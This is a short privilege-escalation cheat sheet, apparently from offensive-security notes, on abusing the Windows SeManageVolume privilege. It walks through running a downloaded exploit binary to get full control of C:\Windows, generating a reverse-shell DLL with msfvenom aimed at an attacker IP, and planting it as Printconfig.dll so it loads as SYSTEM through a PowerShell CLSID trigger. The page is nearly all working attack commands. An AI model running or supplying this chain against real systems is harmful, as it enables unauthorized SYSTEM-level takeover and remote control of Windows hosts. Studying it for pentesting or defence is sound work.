SeManageVolume

Download the SeManageVolumeExploit.exe from here

Run it

.\SeManageVolumeExploit.exe

We now have full unrestricted access (F) to all the files and directories on the machine.

$ icacls C:\Windows
C:\Windows NT SERVICE\TrustedInstaller:(F)
           NT SERVICE\TrustedInstaller:(CI)(IO)(F)
           NT AUTHORITY\SYSTEM:(M)
           NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
           BUILTIN\Users:(M)
           BUILTIN\Users:(OI)(CI)(IO)(F) => !!! LOOK HERE!!!
           BUILTIN\Users:(RX)
           BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
           CREATOR OWNER:(OI)(CI)(IO)(F)
           APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
           APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
           APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
           APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)

Gain SYSTEM shell

First we generate a malicious dll named Printconfig.dll

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f dll > Printconfig.dll

Then we transfer it to C:\Windows\System32\spool\drivers\x64\3\

Finally we run the following 2 commands to catch the shell

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")

$object = [Activator]::CreateInstance($type)

PreviousSeTakeOwnership Next3 - Attack Group Privileges

Last updated 2 years ago